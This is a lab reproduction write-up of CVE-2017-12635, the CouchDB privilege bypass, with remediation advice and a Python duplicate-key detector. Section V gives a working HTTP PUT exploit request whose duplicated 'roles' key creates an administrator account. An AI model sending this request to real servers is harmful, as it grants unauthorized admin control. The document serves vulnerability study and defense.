CVE-2017-12635: CouchDB vertical privilege bypass vulnerability reproduction
2022-07-19 04:59:00 【wavesky111】
I. Vulnerability summary
Apache CouchDB is an open-source NoSQL database that focuses on ease of use and on being "a database that fully embraces the web". It uses JSON as its storage format, JavaScript as its query language, and MapReduce and HTTP as its API.
II. Affected versions
- Versions earlier than 1.7.0, and 2.x versions earlier than 2.1.1
III. Vulnerability principle
1. Erlang and JavaScript parse JSON differently, so the same document is interpreted differently by the two sides. The vulnerability lets an arbitrary user create an administrator account, which makes it a vertical privilege bypass vulnerability. (Source: https://www.anquanke.com/post/id/87256)
2. In other words, when the JavaScript validation function checks the user document we created, it sees "roles": [] (no roles). No roles means no permissions and therefore no harm, so the system judges the document to be safe and the check is bypassed. Afterwards, when CouchDB's Erlang side performs authentication and authorization, the jiffy parser's getter returns only the first value of the duplicated key, i.e. "roles": ["_admin"], so the account we created ends up with admin permissions. (Source: https://blog.csdn.net/qq_45813980/article/details/118654097)
3. Extension: the document is delivered with a PUT request (see the steps below).
IV. Reproduction environment
Kali Linux + Vulfocus
Attacking machine: Kali Linux
Target machine: Vulfocus
V. Experimental steps
1. Start the image environment and access the page.
2. Construct the PUT request and set up an administrator account to log in with:
PUT /_users/org.couchdb.user:wavesky HTTP/1.1
Host: 192.168.117.131:27483
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 101

{
  "type": "user",
  "name": "wavesky",
  "roles": ["_admin"],
  "roles": [],
  "password": "wavesky"
}
3. Visit http://192.168.117.131:27483/_utils; under _users you can see the newly defined user with administrator privileges.
VI. Remediation suggestions
1. Apache CouchDB instances on the public network
Upgrading to the latest version is recommended. Use ECS security groups or firewall policies to limit the CouchDB ports exposed to the Internet and set fine-grained network access control. Enable authentication, do not use the default account and password, configure custom accounts with strong passwords, and guard against brute-force attacks.
2. Apache CouchDB instances on the intranet
Use ECS security groups or firewall policies to limit the CouchDB ports exposed to the Internet and set fine-grained network access control. Enable authentication, do not use the default account and password, configure custom accounts with strong passwords, and guard against brute-force attacks.
Source: https://huskypower.blog.csdn.net/article/details/120880072?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-120880072-blog-121767180.pc_relevant_paycolumn_v3&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-120880072-blog-121767180.pc_relevant_paycolumn_v3&utm_relevant_index=2
3. Add a dedupe_keys field to identify duplicate keys and rewrite the make_object method so that jiffy's JSON parsing agrees with JavaScript's. (Source: https://www.anquanke.com/post/id/87256)
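To illustrate both the parsing difference described in the vulnerability principle (section III) and the duplicate-key check behind fix item 3, here is added example code written for this page (not CouchDB's or jiffy's own code): the two hooks mimic first-key-wins (what the page says jiffy's getter does) and last-key-wins (JavaScript) semantics over the user document from the steps above, and parse_strict rejects any document that repeats a key, which is the check a hardened parser or a reverse proxy in front of /_users should apply.

```python
import json

# Constructed sample: the user document from the write-up, with "roles" given twice.
SAMPLE_BODY = """{
  "type": "user",
  "name": "wavesky",
  "roles": ["_admin"],
  "roles": [],
  "password": "wavesky"
}"""

def first_wins(pairs):
    """Keep the first occurrence of a duplicated key (what the page says jiffy's getter does)."""
    obj = {}
    for key, value in pairs:
        obj.setdefault(key, value)
    return obj

def last_wins(pairs):
    """Keep the last occurrence of a duplicated key (JavaScript JSON.parse semantics)."""
    return dict(pairs)

def roles_seen_by(body, parser):
    """Return the 'roles' value a parser with the given duplicate-key policy would see."""
    return json.loads(body, object_pairs_hook=parser).get("roles", [])

def find_duplicate_keys(body):
    """Return every key that occurs more than once within a single object, at any nesting level."""
    duplicates = []

    def hook(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen and key not in duplicates:
                duplicates.append(key)
            seen.add(key)
        return dict(pairs)

    json.loads(body, object_pairs_hook=hook)
    return duplicates

def parse_strict(body):
    """Parse a JSON document, refusing it outright if any object repeats a key."""
    duplicates = find_duplicate_keys(body)
    if duplicates:
        raise ValueError("duplicate JSON keys rejected: " + ", ".join(duplicates))
    return json.loads(body)
```

For the sample document, roles_seen_by returns [] under last_wins and ["_admin"] under first_wins, which is exactly the gap the validation function and the authorization code fall into; parse_strict closes it by refusing the document.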